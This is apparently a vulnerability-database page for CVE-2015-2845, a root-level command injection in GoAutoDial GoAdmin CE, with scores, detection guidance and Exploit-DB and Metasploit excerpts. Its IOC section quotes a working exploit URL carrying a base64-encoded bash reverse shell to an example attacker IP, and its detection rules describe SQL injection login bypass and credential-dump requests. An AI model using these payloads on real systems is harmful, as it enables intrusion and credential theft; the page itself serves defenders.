CVE-2015-2845
published 2015-05-12CVE-2015-2845: The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion…
PriorityP179critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
71.69%
99.3th percentile
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion of the PATH_INFO.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goautodial | goadmin_ce | — | — |
| goautodial | goadmin_ce | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/index.php/go_site/cpanel/|| bash -c "eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode`"↗
- →Detect command injection attempts in PATH_INFO targeting the cpanel function: look for URL-encoded pipe/shell metacharacters (e.g., %7C%7C, ||) followed by base64-encoded payloads in requests to /index.php/go_site/cpanel/ ↗
- →Detect SQLi authentication bypass: POST to /index.php/go_login/validate_credentials with user_pass containing URL-encoded SQL injection string '%20or%20'1'%3D'1' or literal ' OR '1'='1 ↗
- →Detect SQLi data exfiltration: GET request to /index.php/go_site/go_get_user_info/ with PATH_INFO containing ' OR active='Y to dump admin credentials from the database ↗
- →Detect version check reconnaissance: unauthenticated GET request to /changelog.txt; a response body NOT containing '1421902800' indicates a vulnerable GoAutoDial instance ↗
- →Detect malicious file upload: filenames matching the pattern go_*.wav.php uploaded to the audiostore endpoint, exploiting insufficient extension validation ↗
- →Monitor execution of /usr/share/goautodial/goautodialc.pl with unexpected arguments containing shell metacharacters (||, &&, ;) as this is the underlying exec target for the command injection ↗
- →The Metasploit module uses User-Agent 'Mozilla/5.0' with Accept-Encoding 'identity' across all exploit requests; correlate this UA with the specific attack URIs for higher-fidelity detection ↗
- ·The command injection PoC uses a hardcoded attacker IP (192.168.0.11) and port (4444) in the base64 payload; real-world attacks will use different IPs/ports encoded in base64, so detections must decode and inspect base64 blobs rather than matching the literal example IP ↗
- ·The Metasploit module hardcodes the payload as a base64-encoded reverse-tcp bash one-liner; the handler must be configured for cmd/unix/reverse_bash to receive the connection ↗
- ·Any GoAutoDial 3.3 version between 3.3-1406088000 and 3.3-1421902800 may be vulnerable; the fixed version is 3.3-1421902800 identifiable via changelog.txt ↗
- ·Command injection is executed with root privileges, meaning post-exploitation activity will appear as root; process lineage from goautodialc.pl to bash should be treated as high severity ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
exploitdb·2017-07-05
CVE-2015-2845 GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "GoAutoDial 3.3 Authentication Bypass / Command Injection",
'Description' => %q{
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded
Exploit-DB
GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
exploitdb·2015-04-21·CVSS 10.0
CVE-2015-2845 [CRITICAL] GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
---
Affected software: GoAutoDial
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
Vendor advisory: http://goautodial.org/news/21
Abstract:
Multiple vulnerabilties exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.
Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
Refer to the product changelog.txt: https://github.co
Metasploit
GoAutoDial 3.3 Authentication Bypass / Command Injection
metasploit
GoAutoDial 3.3 Authentication Bypass / Command Injection
GoAutoDial 3.3 Authentication Bypass / Command Injection
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. This module has been tested successfully on GoAutoDial version 3.3-1406088000.
No writeups or analysis indexed.
http://goautodial.org/news/21http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.htmlhttp://www.securityfocus.com/archive/1/535319/100/1100/threadedhttp://www.securityfocus.com/bid/74281https://www.exploit-db.com/exploits/36807/https://www.exploit-db.com/exploits/42296/http://goautodial.org/news/21http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.htmlhttp://www.securityfocus.com/archive/1/535319/100/1100/threadedhttp://www.securityfocus.com/bid/74281https://www.exploit-db.com/exploits/36807/https://www.exploit-db.com/exploits/42296/
2015-05-12
Published